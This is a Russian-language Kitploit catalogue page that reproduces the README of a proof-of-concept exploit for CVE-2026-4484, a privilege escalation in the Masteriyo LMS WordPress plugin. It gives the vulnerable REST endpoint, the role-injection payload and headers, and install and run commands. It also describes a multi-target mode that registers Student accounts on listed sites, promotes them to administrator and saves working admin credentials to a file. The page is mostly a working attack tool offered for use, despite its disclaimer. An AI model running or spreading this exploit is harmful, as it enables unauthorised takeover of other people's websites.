Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 - Отсутствие авторизации: повышение привилегий аутентифицированного пользователя (Student+) до администратора | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-4484
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - Отсутствие авторизации: повышение привилегий аутентифицированного пользователя (Student+) до администратора

Репозиторий
54 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-4484

Masteriyo LMS <= 2.1.6 — Отсутствие проверки авторизации: повышение привилегий аутентифицированного пользователя (Student+) до администратора

Печатающий SVG


🔴 Обзор уязвимости

CVE-2026-4484 — повышение привилегий аутентифицированного пользователя (Student → Administrator)

Описание:
Плагин Masteriyo LMS для WordPress уязвим к повышению привилегий во всех версиях вплоть до 2.1.6 включительно. Уязвимость берёт начало в функции InstructorsController::prepare_object_for_database, которая не ограничивает должным образом назначение ролей во время REST API-запросов. Аутентифицированный злоумышленник, имеющий доступ уровня Student (или выше), может сформировать особым образом POST-запрос к конечной точке REST API Masteriyo — внедрив "roles": ["administrator"] в тело запроса, — чтобы незаметно повысить свою учётную запись до уровня администратора WordPress, получив полный контроль над сайтом без какого-либо участия администратора.


🛠️ Описание инструмента

Это эксплойт Proof-of-Concept (PoC), предназначенный для WordPress-установок, на которых работает уязвимая версия плагина Masteriyo LMS. Инструмент поддерживает два режима атаки:

РежимИмяПотокСценарий использования

Схема атаки

root@kitploit:~
[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 Требования

Системные требования

  • Python 3.8 или выше
  • Linux / Windows / macOS

Python-зависимости

root@kitploit:~
pip install requests urllib3 colorama

Или через файл requirements:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ Использование

Базовый запуск

root@kitploit:~
python3 CVE-2026-4484.py

Инструмент использует интерактивный терминальный интерфейс — все параметры запрашиваются во время выполнения.


🗂️ Формат списка целей

Создайте текстовый файл (например, list.txt) с одной целью в строке:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 Режим 1 — Nx_1 (Регистрация + Вход + Повышение привилегий)

Используйте этот режим, если у вас нет существующей учётной записи на цели. Инструмент автоматически регистрирует новую учётную запись студента, а затем повышает её привилегии.

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

Выполняемые автоматически шаги:

  1. GET /account/signup/ → извлечение nonce регистрации
  2. POST /st/ → регистрация новой учётной записи как Student
  3. GET /account/ → извлечение nonce для входа
  4. POST /wp-admin/admin-ajax.php → вход через Masteriyo AJAX
  5. GET /account/#/dashboard → извлечение current_user_id + nonce
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} с телом {"roles":["administrator"]}
  7. Повторный вход с новой сессией → проверка доступа к админ-панели
  8. Запись подтверждённых целей в Login_admin.txt

🟩 Режим 2 — Nx_2 (Вход + Повышение привилегий — существующая учётная запись)

Используйте этот режим, если у вас уже есть действующая учётная запись Student или Instructor на цели.

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

Выполняемые автоматически шаги:

  1. GET /account/ → извлечение nonce для входа
  2. POST /wp-admin/admin-ajax.php → вход через Masteriyo AJAX
  3. GET /account/#/dashboard → извлечение current_user_id + nonce
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} с телом {"roles":["administrator"]}
  5. Повторный вход с новой сессией → проверка доступа к админ-панели
  6. Запись подтверждённых целей в Login_admin.txt

📁 Выходные файлы

ФайлОписание
Login_admin.txtВсе подтверждённые случаи повышения привилегий до администратора

Формат выходных данных

root@kitploit:~
https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

Пример вывода терминала

root@kitploit:~
[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 Технические детали

Уязвимая конечная точка

root@kitploit:~
POST /wp-json/masteriyo/v1/users/instructors/{user_id}

Полезная нагрузка эксплойта

root@kitploit:~
{
  "roles": ["administrator"]
}

Требуемые заголовки

root@kitploit:~
Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

Первопричина

Функция InstructorsController::prepare_object_for_database в Masteriyo LMS обрабатывает параметр roles из тела REST-запроса, не проверяя, обладает ли запрашивающий пользователь возможностями edit_users или promote_users. Любой аутентифицированный пользователь (уровня Student и выше), имеющий доступ к этой конечной точке, может отправить произвольное значение роли — в том числе administrator, — которое затем напрямую сохраняется в таблицу метаданных пользователей WordPress.


📡 Контакты и автор

Автор: Nxploited (Khaled Alenazi)

 


⚠️ Юридический отказ от ответственности

ДАННЫЙ ИНСТРУМЕНТ ПРЕДОСТАВЛЕН ИСКЛЮЧИТЕЛЬНО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И САНКЦИОНИРОВАННЫХ ИССЛЕДОВАНИЙ БЕЗОПАСНОСТИ.

Автор, Nxploited (Khaled Alenazi), и все участники этого проекта не одобряют, не поддерживают и не несут никакой ответственности за неправомерное использование данного инструмента или любой ущерб, причинённый в результате использования этого ПО против систем, на которые у вас нет явного письменного разрешения.

  • ✅ Разрешено: использование на системах, которыми вы владеете или на тестирование которых получили явное письменное разрешение.
  • ❌ Запрещено: использование против любых систем без предварительного явного письменного разрешения владельца системы.

Несанкционированный доступ к компьютерным системам является незаконным и наказуем в соответствии с действующим законодательством, включая, помимо прочего, Computer Fraud and Abuse Act (CFAA), Computer Misuse Act (CMA) и эквивалентные законы по всему миру.

Используя этот инструмент, вы принимаете на себя полную ответственность за свои действия и подтверждаете, что имеете законные полномочия на тестирование указанных систем.

Автор не несёт никакой ответственности за любые прямые, косвенные, случайные или последующие убытки, возникшие в результате использования или неправильного использования этого ПО.


© 2026 Nxploited (Khaled Alenazi) — Только для санкционированных исследований безопасности.

Скачать инструмент
ПолеСведения
ID CVECVE-2026-4484
КритичностьВЫСОКАЯ — оценка CVSS v3.1: 8.8
ВекторCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Затронутое ПОПлагин Masteriyo LMS для WordPress
Затронутые версииВсе версии вплоть до 2.1.6 включительно
Тип уязвимостиПовышение привилегий (манипуляция ролями)
Требуется аутентификацияДа — уровень Student или выше
CWECWE-269: Improper Privilege Management
1Nx_1Регистрация → Вход → Повышение привилегий → Проверка адм. доступаАтака с нуля — существующая учётная запись не требуется
2Nx_2Вход → Повышение привилегий → Проверка адм. доступаЕсть существующая учётная запись (Student/Instructor)